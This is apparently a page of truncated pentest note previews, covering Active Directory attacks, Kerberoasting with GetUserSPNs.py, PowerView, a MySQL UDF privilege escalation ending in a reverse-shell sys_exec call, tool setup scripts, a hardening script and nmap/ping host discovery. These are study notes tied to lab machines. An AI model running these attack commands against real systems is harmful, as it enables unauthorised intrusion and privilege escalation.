rahmiy

Sources

Google spreadsheet

Linux Boxes

Lame

Writeup 0xdf

rahmiy

Note: I did not author this, i found it somehwere.

Active Directory Attacks

Summary

• Tools
• Most common paths to AD compromise
  • MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
  • Open Shares
• [GPO - Pivoting with Local Admin

rahmiy

# Enumeration

# Credential Injection

runas.exe /netonly /user:<domain>\<username> cmd.exe


# enumeration users
users
net user /domain

rahmiy

========================================================================================================================
						Kerberos Attacks
========================================================================================================================



[+] Kerbose attack

./GetUserSPNs.py -dc-ip 192.168.168.10 sittingduck.info/notanadmin

rahmiy

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

rahmiy

# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)

mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');

rahmiy

#!/bin/bash
#LAST UPDATE: 30/03/2020
#LAS CHANGE: added pkg-config.
RED='\033[0;31m'
GRN='\033[0;32m'
YLL='\033[1;33m'
NC='\033[0m' # No Color
#FILE NAMES
PTROOTDIR="pentestTools"
PTDIRS="{lists,tools,shells/{klbuiltin,}}"

rahmiy

#!/bin/bash
MODPROBEFILE="/etc/modprobe.d/CIS.conf"
#MODPROBEFILE="/tmp/CIS.conf"
ANSWER=0

analyze_part () {
	if [ "$#" != "1" ]; then
		options="$(echo $@ | awk 'BEGIN{FS="[()]"}{print $2}')"
    	echo "[+]$@"
    	apply_part_rule $1

rahmiy

=======================HOST DISCOVERY===========================================
Host discovery con PING:
$ for octect in (seq 0 254)
  echo "Pinging [X.X.X.$octect]"
  ping -c 2 10.150.150.$octect | grep "bytes from" | awk '{print $4}' | uniq -d | cut -d ":" -f 1 | tee -a targets.list
end

Host discovery con NMAP IMCP o ARP

$sudo nmap -vv -sn -PE 10.150.150.0/24 -oG HOSTDISCOVERY_ICMP.gnmap 

rahmiy

#!/bin/bash
##### (Cosmetic) Colour output
RED="\033[01;31m"      # Issues/Errors
GREEN="\033[01;32m"    # Success
YELLOW="\033[01;33m"   # Warnings/Information
BLUE="\033[01;34m"     # Heading
BOLD="\033[01;01m"     # Highlight
RESET="\033[00m"       # Normal
echo -e "${GREEN}"
##################################installation starts ######################################